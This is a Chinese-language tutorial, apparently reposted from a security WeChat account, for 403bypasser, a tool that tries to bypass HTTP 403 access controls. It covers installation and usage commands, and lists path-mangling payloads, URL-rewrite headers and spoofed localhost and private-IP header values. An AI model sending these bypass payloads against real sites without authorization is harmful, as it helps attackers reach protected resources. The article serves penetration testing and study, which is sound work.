关于403bypasser
403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。403bypasser项目目前仍处于积极开发阶段,并且还会增加新的功能。
该工具基于Python语言开发,因此具备良好的跨平台特性。
工具安装
首先,我们需要使用下列命令将该项目源码克隆至本地:
git clone https://github.com/yunemse48/403bypasser.git
接下来,运行下列命令安装好该工具所需的依赖模块:
pip install -r requirements.txt
此时,403bypasser已完成安装。
工具参数
工具使用
使用样例1
python3 403bypasser.py -u https://example.com -d /secret
使用样例2
python3 403bypasser.py -u https://example.com -D dirlist.txt
使用样例3
python3 403bypasser.py -U urllist.txt -d /secret
使用样例4
python3 403bypasser.py -U urllist.txt -D dirlist.txt
注意事项:下面给出的例子中,不同斜杠使用的结果都是一样的,你可以选择自己喜欢的方式:
python3 403bypasser.py -u https://example.com -d secret
python3 403bypasser.py -u https://example.com -d /secret
python3 403bypasser.py -u https://example.com -d /secret/
python3 403bypasser.py -u https://example.com -d secret/
python3 403bypasser.py -u https://example.com/ -d secret
该工具支持的功能
请求方法篡改
将GET请求转换为POST请求
路径篡改
/%2e/secret
/secret/
/secret..;/
/secret/..;/
/secret%20
/secret%09
/secret%00
/secret.json
/secret.css
/secret.html
/secret?
/secret??
/secret???
/secret?testparam
/secret#
/secret#test
/secret/.
//secret//
/./secret/./
通过非标准Header重写目标URL
X-Original-URL: /secret
X-Rewrite-URL: /secret
其他Header&值
Header:
X-Custom-IP-Authorization
X-Forwarded-For
X-Forward-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Client-IP
X-Real-IP
值:
localhost
localhost:80
localhost:443
127.0.0.1
127.0.0.1:80
127.0.0.1:443
2130706433
0x7F000001
0177.0000.0000.0001
0
127.1
10.0.0.0
10.0.0.1
172.16.0.0
172.16.0.1
192.168.1.0
192.168.1.1
工具运行截图
项目地址
403bypasser:https://github.com/yunemse48/403bypasser
声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果.
学习更多渗透技能!供靶场练习技能
(扫码领白帽黑客视频资料及工具)
原文始发于微信公众号(渗透师老A):如何使用403bypasser绕过目标页面上的访问控制限制
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论